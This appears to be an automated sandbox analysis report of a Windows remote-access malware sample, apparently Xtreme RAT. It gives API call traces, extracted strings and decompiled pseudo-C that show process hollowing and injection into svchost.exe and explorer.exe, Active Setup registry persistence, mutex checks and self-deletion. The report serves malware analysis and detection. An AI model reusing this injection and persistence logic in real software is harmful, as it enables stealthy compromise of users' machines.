Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(019E0000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(019E0000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

.xtr, xrefs: 00C8A3C2
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
XTREME, xrefs: 00C8A42F
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
%DEFAULTBROWSER%, xrefs: 00C8A208
svchost.exe, xrefs: 00C8A196
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
Mutex, xrefs: 00C8A489
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
SOFTWARE\, xrefs: 00C8A472
local, xrefs: 00C8A3EF
C:\Windows\InstallDir\, xrefs: 00C8A156
explorer.exe, xrefs: 00C8A383
InstalledServer, xrefs: 00C8A0D9
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
DSma9HnKaPERSIST, xrefs: 00C8A16F
SOFTWARE\, xrefs: 00C8A0CD
DSma9HnKa, xrefs: 00C8A0C8

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8A024, Relevance: 33.5, APIs: 9, Strings: 10, Instructions: 262
sleep

C-Code - Quality: 86%

			E00C8A024(void* __ebx, void* __edx, void* __eflags) {
				void* _t34;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t90;
				long _t91;
				int* _t102;
				int* _t107;
				int* _t113;
				intOrPtr* _t126;
				intOrPtr* _t140;
				void* _t163;
				WCHAR* _t176;
				signed int _t194;
				void* _t195;
				void* _t224;
				intOrPtr _t225;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr* _t239;
				intOrPtr _t243;
				intOrPtr* _t245;
				WCHAR* _t269;
				void* _t272;
				void* _t273;
				intOrPtr _t274;
				void* _t276;
				void* _t278;

				_t276 = __eflags;
				E00C814F0();
				_push(_t273);
				_push(0xc8a09d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				_push(E00C812A4(0x1b) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xb) + 1);
				_push(E00C812A4(6) + 0x7d1);
				_t34 = E00C836D8( *0xc8f898, _t276);
				_pop(_t224);
				_pop(_t195); // executed
				E00C83BC4(_t34, __ebx, _t195, _t224); // executed
				_pop(_t225);
				 *[fs:eax] = _t225;
				E00C83674( *0xc8f898);
				E00C83674(E00C836D8( *0xc8f898, _t276));
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t276), _t276, 2,  *0xc8f898); // executed
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t269 = 0xc8ec8a;
				E00C82E48( *0xc8f898);
				E00C82914(0xc914e8,  *0xc8f898);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t276));
				E00C82914(0xc91b06, _t53);
				_t194 = E00C836D8( *0xc8f898, _t276);
				E00C82E48(_t194);
				E00C82914(0xc916f2, _t194);
				if( *0xc8f38a == 1) {
					_t176 = E00C8263C(0, 0, 0xc8f3da); // executed
					_t269 = _t176;
					_t278 = GetLastError() - 0xb7;
					if(_t278 == 0) {
						CloseHandle(_t269);
					} else {
						CloseHandle(_t269);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t278);
						E00C8291C();
						E00C82E48( *0xc8f89c);
						E00C82914(0xc8fac0,  *0xc8f89c);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
						E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88EF8);
					}
				}
				E00C81CD8(_t273 - 0x1838, 0x11, 0xc8f2b2);
				_t233 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t273 - 0x1838)), _t233);
				if(_t278 != 0) {
					E00C81CD8(_t273 - 0x183c, 0x11, 0xc8f2b2);
					_t235 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t273 - 0x183c)), _t235);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t163 = E00C83A54( *0xc8f89c, 0xc8f8ac);
							__eflags = _t163;
							if(_t163 != 0) {
								 *0xc8f89c = E00C83B10( *0xc8f8ac);
							} else {
								 *0xc8f89c = E00C83094();
							}
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t272 = 0;
				 *0xc8f8a8 = 0;
				_t279 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t194 =  *0xc8f898;
					_t269 = E00C833A8(E00C83420(0, _t194, 0), 0xc8a704, _t279);
					if(E00C83960(_t194, E00C82E48(_t194), _t269) == 0) {
						SetFileAttributesW(_t269, 0x80);
						_t281 = E00C82E48(_t269) + _t155;
						E00C82914(0xc91d10, _t269);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t269) + _t155), 0xc91f1c, _t273), 0xc91d10, E00C897F4);
					}
				}
				_t79 = E00C833A8(E00C836D8(0xc918fc, _t281), 0xc90fdc, _t281);
				_t239 =  *0xc8b0f0; // 0xc8e01c
				 *_t239 = _t79;
				_t80 =  *0xc8b0f0; // 0xc8e01c
				_t82 = E00C833A8( *_t80, L".xtr", _t281);
				_t241 =  *0xc8b0f0; // 0xc8e01c
				 *_t241 = _t82;
				_t83 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t83) != 0 && E00C87B84(L"local", _t194, _t272) == 1) {
					_t284 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, 0xc8fac0, 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
					}
					_t245 =  *0xc8b0e4; // 0xc8e024
					_t126 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t126, _t194, L"XTREME",  *_t245 - 0x1e, _t269, _t272, _t284);
					E00C82E14(_t273 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t273 - 0x1840,  *((intOrPtr*)(_t273 - 0x1844)), L"SOFTWARE\\", _t284);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t273 - 0x1840))), _t284, 2, 0xc90fdc);
					CloseHandle( *0xc8f8b0);
					_t140 =  *0xc8b0e8; // 0xc8e020
					_t241 = 0;
					E00C84600( *_t140, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t286 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					CloseHandle( *0xc8f8b0);
					while(1) {
						_t242 = E00C88BC0;
						 *0xc8f8a8 = E00C83CE4( *0xc8f8ac, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4); // executed
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t113 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t113);
							_t242 = 0xc91f1c;
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
						}
						_t272 = _t272 + 1;
						_t90 = E00C8263C(0, 0, 0xc8f38c); // executed
						_t270 = _t90;
						_t91 = GetLastError();
						__eflags = _t91 - 0xb7;
						_t194 = _t194 & 0xffffff00 | _t91 == 0x000000b7;
						CloseHandle(_t90);
						__eflags = _t194;
						if(_t194 == 0) {
							_t107 =  *0xc8b0e0; // 0xc8b000
							TerminateProcess( *0xc8f8ac,  *_t107);
							_t242 = 0xc91f1c;
							 *0xc8f8ac = E00C83EA8( *0xc8f89c, 0xc91f1c, _t273);
						}
						__eflags = _t272 - 7;
						if(_t272 >= 7) {
							break;
						}
						__eflags = _t194 - 1;
						if(_t194 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t194, _t242, _t270, _t272); // executed
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t102 =  *0xc8b0e0; // 0xc8b000
						TerminateProcess( *0xc8f8ac,  *_t102);
						E00C88BC0(_t194, _t270, _t272, __eflags, 0xc8fccc);
					}
					__eflags = _t272 - 7;
					if(_t272 >= 7) {
						__eflags = _t194;
						if(_t194 == 0) {
							ShellExecuteW(0, L"open",  *0xc8f898, 0, 0, 0);
						}
					}
					goto L39;
				} else {
					CloseHandle( *0xc8f8b0);
					E00C840F8(0xc8e07c, _t194, _t241, _t269, _t272);
					E00C88BC0(_t194, _t269, _t272, _t286, 0xc8fccc);
					L39:
					_pop(_t243);
					 *[fs:eax] = _t243;
					_push(0xc8a632);
					E00C81B90(_t273 - 0x1844, 5);
					return E00C81B78(_t273 - 0x14);
				}
			}

0x00c8a024
0x00c8a024
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0ac
0x00c8a0bb
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0fe
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b9
0x00c8a1cd
0x00c8a1e1
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a53e
0x00c8a543
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a58d
0x00c8a592
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C83775

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,?,00000000,ServerStarted,?,00C89F0A,00000002,00C8F8B4,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,?), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,00C8F3DA,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(?), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(?), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,00C8FAC0,0000020A,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(?), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(?), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

